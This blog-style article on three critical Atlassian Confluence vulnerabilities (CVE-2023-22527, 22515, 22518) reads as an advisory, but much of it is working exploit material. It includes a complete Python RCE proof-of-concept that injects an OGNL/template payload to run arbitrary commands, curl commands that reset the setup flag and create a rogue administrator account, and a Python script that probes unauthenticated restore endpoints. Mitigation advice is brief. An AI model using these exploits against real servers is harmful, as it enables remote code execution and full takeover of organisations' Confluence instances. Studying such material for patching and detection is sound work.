Unraveling Three Critical Vulnerabilities in Atlassian Confluence: CVE-2023–22515, CVE-2023–22518, and CVE-2023–22527
Explore the critical vulnerabilities CVE-2023–22527, CVE-2023–22515, and CVE-2023–22518 in Atlassian Confluence, their impacts, discovery, and how they operate.
In January 2024, the cybersecurity community turned its attention to a critical vulnerability in Atlassian Confluence Data Center and Server, identified as CVE-2023–22527.
This vulnerability, alongside CVE-2023–22515 and CVE-2023–22518, represents a series of security challenges faced by users of the popular collaboration software.
This article provides an in-depth look at each of these vulnerabilities, their discovery, and how they work, highlighting the urgent need for awareness and action among the cybersecurity and developer communities.
CVE-2023–22527: A Template Injection Vulnerability
Discovery Date: CVE-2023–22527 was disclosed on January 16, 2024, signaling a crucial moment for Atlassian in its efforts to safeguard the Confluence platform against threats. The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.
How It Works: CVE-2023–22527 allows unauthenticated attackers to execute arbitrary code remotely by exploiting a template injection flaw in out-of-date versions of Confluence Data Center and Server. The vulnerability arises from the application’s handling of user input, enabling attackers to inject malicious templates that lead to remote code execution (RCE) without requiring user interaction.
Breaking Down the Exploit Strategy: Here is a potential PoC I found on the internet:
# @Time : 2024/1/23
# @Author : Nguyễn Đức Mạnh (MINKAY)
# @Vulnerability : CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server
import argparse
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
def get_confluence_version(target):
parsed_url = urlparse(target)
url = f"http://{parsed_url.netloc}/"
try:
response = requests.get(url)
response.raise_for_status()
soup = BeautifulSoup(response.text, 'html.parser')
version_span = soup.find('span', {'id': 'footer-build-information'})
if version_span:
confluence_version = version_span.text.strip()
return confluence_version
except requests.exceptions.RequestException as e:
print(f"Error: {e}")
return None
def check_exploitable_version(version):
exploitable_versions = ['8.0.', '8.1.', '8.2.', '8.3.', '8.4.', '8.5.0', '8.5.1', '8.5.2', '8.5.3']
for exploitable_version in exploitable_versions:
if version.startswith(exploitable_version):
return True
return False
def exploit(target, cmd):
confluence_version = get_confluence_version(target)
if confluence_version:
print(f"Confluence version: {confluence_version}")
if check_exploitable_version(confluence_version):
url = f"{target}/template/aui/text-inline.vm"
http_proxy = "http://127.0.0.1:8080"
https_proxy = "http://127.0.0.1:8080"
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = r"label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.
context\u0027\u005d.internalGet(\u0027ognl\u0027).
findValue(#parameters.x,{})%2b\u0027&[email protected].
ServletActionContext@getResponse().
setHeader('X-Cmd-Response',
(new freemarker.template.utility.Execute()).
exec({'"+ cmd +"'}))"
response = requests.post(url, headers=headers, data=data, verify=False)
if (response.headers.get("X-Cmd-Response")):
print("Command Output:")
print(response.headers.get("X-Cmd-Response"))
else:
print("No response")
else:
print("The version cannot exploit the exploit")
else:
print("Unable to determine version of Confluence")
def main():
parser = argparse.ArgumentParser(
description="Send request with target and cmd parameters",
usage="python3 CVE-2023-22527.py --target <target> --cmd <cmd>\nExample: python3 CVE-2023-22527.py --target http://192.168.139.202 --cmd \"whoami\""
)
parser.add_argument("--target", required=True, help="Target address without http://")
parser.add_argument("--cmd", required=True, help="Value for the cmd parameter")
args = parser.parse_args()
exploit(args.target, args.cmd)
if __name__ == "__main__":
main()
CVE-2023–22515 and CVE-2023–22518: Detailed Analysis
CVE-2023–22515
Discovery Date: This vulnerability was disclosed on October 4, 2023, marking the start of a troubling period for Atlassian Confluence Data Center and Server’s security. The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.
How It Works: Identified as a zero-day vulnerability exploited before a patch was available, CVE-2023–22515 allowed attackers to gain unauthorized access or control over affected Confluence servers. It specifically exploited the software’s input handling to bypass authentication or authorization controls, enabling elevated privileges or access to sensitive data.
Breaking Down the Exploit Strategy: The exploitation process can be broken down into several key steps, each leveraging unique aspects of the Confluence architecture and its defenses:
- Parameter Parsing Vulnerability: The exploit begins with the manipulation of how Confluence’s Xwork interceptors parse URL parameters, allowing attackers to directly influence object properties. This step lays the groundwork for deeper system manipulation.
- Bypassing Endpoint Restrictions: Although direct modifications are typically blocked post-setup through
/setup/*
endpoints, the exploit cleverly navigates around these restrictions by targeting the/server-info.action
endpoint. This choice of target is strategic, exploiting gaps in endpoint security to reinitiate setup processes. - Resetting the Setup Completion Flag: Central to the exploit is the manipulation of the setup completion flag within Confluence’s configuration. By marking the setup as incomplete, attackers can unlock restricted setup functionalities, paving the way for further system manipulation.
- Circumventing Cross-Site Request Forgery Protections: The exploit also demonstrates a method to bypass Confluence’s XSRF protections by using a specific header in the request. This step is crucial for executing unauthorized actions without detection.
- Final Steps to System Compromise: Utilizing crafted
curl
commands, the attacker completes the exploitation by creating a new administrative user and finalizing the setup under their control. This sequence of actions effectively grants attackers full control over the Confluence instance.
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\;
curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\;
curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action
CVE-2023–22518
Discovery Date: Announced on October 31, 2023, CVE-2023–22518 highlighted continued security concerns for Atlassian Confluence.The criticality of this vulnerability is underscored by its CVSS score of 10.0, signaling maximum severity in terms of impact and exploitability.
How It Works: CVE-2023–22518 was an improper authorization vulnerability that allowed attackers to perform unauthorized actions by exploiting weaknesses in the software’s access control mechanisms. This could lead to data leakage, unauthorized modifications, or other malicious activities.
Breaking Down the Exploit Strategy:
- The exploit’s ingenuity lies in its manipulation of complex parameters through Confluence’s OGNL (Object-Graph Navigation Language) processing, specifically targeting methods capable of bypassing authentication via property modifications. This approach required a nuanced understanding of Confluence’s internal routing and permission checks, particularly within the
/json
namespace which supplements the/admin
namespace functionalities. - The pivotal moment in the exploitation process involved bypassing the WebSudoInterceptor, a security mechanism designed to require elevated privilege re-authentication for critical operations. By identifying an action class devoid of the
WebSudoRequired
annotation and any inherent authentication checks, attackers could navigate Confluence’s defenses. - The exploit process culminated in crafting HTTP requests to the
/json/setup-restore.action
endpoint, bypassing the need for authentication by exploiting the lack of theWebSudoRequired
annotation and leveraging thesynchronous=true
parameter to force a database restore operation without prior authentication.
import requests
import random
import string
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def random_string(length=10):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(length))
def post_setup_restore(baseurl):
paths = ["/json/setup-restore.action",
"/json/setup-restore-local.action",
"/json/setup-restore-progress.action",
"/server-info.action"]
for path in paths:
url = f"{baseurl.rstrip('/')}{path}"
headers = {
"X-Atlassian-Token": "no-check",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7"
}
rand_str = random_string()
data = (
"------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
"Content-Disposition: form-data; name=\"buildIndex\"\r\n\r\n"
"true\r\n"
"------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
f"Content-Disposition: form-data; name=\"file\";filename=\"{rand_str}.zip\"\r\n\r\n"
f"{rand_str}\r\n"
"------WebKitFormBoundaryT3yekvo0rGaL9QR7\r\n"
"Content-Disposition: form-data; name=\"edit\"\r\n\r\n"
"Upload and import\r\n"
"------WebKitFormBoundaryT3yekvo0rGaL9QR7--\r\n"
)
try:
response = requests.post(url, headers=headers, data=data.encode('utf-8'), timeout=10, verify=False)
if (response.status_code == 200 and
'The zip file did not contain an entry' in response.text and
'exportDescriptor.properties' in response.text):
print(f"[+] Vulnerable to CVE-2023-22518 on host {url}!")
else:
print(f"[-] Not vulnerable to CVE-2023-22518 for host {url}.")
except requests.RequestException as e:
print(f"[*] Error connecting to {url}. Error: {e}")
def main():
parser = argparse.ArgumentParser(description="Post setup restore script")
parser.add_argument('--url', help='The URL to target', required=False)
parser.add_argument('--file', help='Filename containing a list of URLs', required=False)
args = parser.parse_args()
if args.url:
post_setup_restore(args.url)
elif args.file:
with open(args.file, 'r') as f:
for line in f:
url = line.strip()
if url:
post_setup_restore(url)
else:
print("You must provide either --url or --file argument.")
if __name__ == "__main__":
main()
The Significance of These Vulnerabilities
The disclosure of CVE-2023–22527, along with CVE-2023–22515 and CVE-2023–22518, emphasizes the importance of maintaining updated software and implementing strong security measures. Atlassian Confluence has emerged as a prime target for attackers due to its widespread adoption and the valuable data it holds.
Recommendations for Mitigation
In response to these vulnerabilities, Atlassian released patches and updates for the affected versions. For CVE-2023–22527, versions 8.5.4 LTS and above, including specific updates for Data Center, contain fixes. I strongly recommend that organizations using Confluence update their installations immediately to protect against these vulnerabilities.
Conclusion
CVE-2023–22527, along with CVE-2023–22515 and CVE-2023–22518, serve as stark reminders of the persistent risks in our digital environment. The importance of keeping systems up to date and adhering to security best practices cannot be overstated. I encourage organizations to remain vigilant, promptly respond to security advisories, and foster a culture of cybersecurity awareness.
Your Insights and Experiences
Have you faced these vulnerabilities in your environment? What strategies have you employed to manage software vulnerabilities? I’d love to hear your thoughts and experiences in the comments below.
👏 If you found this analysis informative, please clap and follow me for more insights into cybersecurity trends and best practices. Your support helps me keep the community informed and secure.
Follow me on Twitter for the latest in cybersecurity !
Connect with me on LinkedIn for professional insights !
References and Further Reading
To gain a deeper understanding of these vulnerabilities and their implications for cybersecurity, the following resources offer extensive analyses and discussions:
- Atlassian Security Advisories: Atlassian provides detailed advisories and mitigation steps for vulnerabilities affecting their products. Visit Atlassian’s official security advisory page.
- CVE Details: The CVE database offers comprehensive information about the vulnerabilities, including technical descriptions and impact assessments. Explore CVE details.
- Exploit Database: For those interested in the technical specifics of cybersecurity vulnerabilities, the Exploit Database contains PoC examples and exploit techniques. See Exploit Database.
- OWASP: The Open Web Application Security Project provides resources on securing web applications and services, including guidelines that can help prevent similar vulnerabilities. Learn from OWASP.
- Security Blogs and Analysis: Blogs such as Rapid7’s AttackerKB and the research blog by Sirius Ninja offer in-depth analyses of vulnerabilities and their exploitation in the wild. Read Rapid7’s AttackerKB analysis and explore Sirius Ninja’s research.